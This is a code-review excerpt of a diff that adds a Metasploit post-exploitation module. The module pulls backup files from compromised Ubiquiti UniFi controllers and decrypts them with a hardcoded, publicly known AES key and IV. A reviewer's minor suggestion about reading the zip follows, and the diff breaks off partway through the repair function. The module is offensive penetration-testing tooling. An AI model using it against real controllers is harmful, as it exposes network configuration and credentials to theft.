modules/post/multi/gather/ubiquiti_unifi_backup.rb

```diff
@@ -0,0 +1,171 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'zip'
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Windows::UserProfiles
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'Multi Gather Ubiquiti UniFi Controller Backup',
+      'Description'   => %q{
+        On an Ubiquiti UniFi controller, reads the system.properties configuration file
+        and downloads the backup and autobackup files.  The files are then decrypted using
+        a known encryption key, then attempted to be repaired by zip.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        =>
+        [
+          'h00die', #metasploit module
+          'zhangyoufu', # git scripts
+          'justingist' # git script
+        ],
+      'Platform' => [ 'linux', 'win' ],
+      'SessionTypes' => %w[shell meterpreter],
+      'References' =>
+        [
+          ['URL', 'https://github.com/zhangyoufu/unifi-backup-decrypt/'],
+          ['URL', 'https://github.com/justingist/POSH-Ubiquiti/blob/master/Posh-UBNT.psm1'],
+          ['URL', 'https://help.ubnt.com/hc/en-us/articles/205202580-UniFi-system-properties-File-Explanation'],
+          ['URL', 'https://community.ubnt.com/t5/UniFi-Wireless/unf-controller-backup-file-format/td-p/1624105']
+        ]
+    ))
+
+      register_options([
+        OptPath.new('SYSTEMFILE', [false, 'Custom system.properties file location']),
+        OptPath.new('BACKUPFOLDER', [false, 'Custom backup folder']),
+      ])
+  end
+
+  def decrypt(contents)
+    aes = OpenSSL::Cipher.new('aes-128-cbc')
+    aes.key = 'bcyangkmluohmars' # https://github.com/zhangyoufu/unifi-backup-decrypt/blob/master/Extract.java#L17
+    aes.padding = 0
+    aes.decrypt
+    aes.iv = 'ubntenterpriseap'
+    aes.update(contents)
+  end
+
+  def repair(fname)
+    zip_exe = Msf::Util::Helper.which('zip')
+    if zip_exe.nil?
+      return nil
+    end
+    print_status('Attempting to repair zip file (this is normal)')
+    temp_file = Rex::Quickfile.new("fixed_zip")
+    system("yes | #{zip_exe} -FF #{fname} --out #{temp_file.path}.zip > /dev/null")
+    if $? == 0
+      return File.open("#{temp_file.path}.zip", 'rb') { |f| f.read}
```

Comment:
`File.read` should also work for binary data (I think):

```suggestion
      return File.read("#{temp_file.path}.zip")
```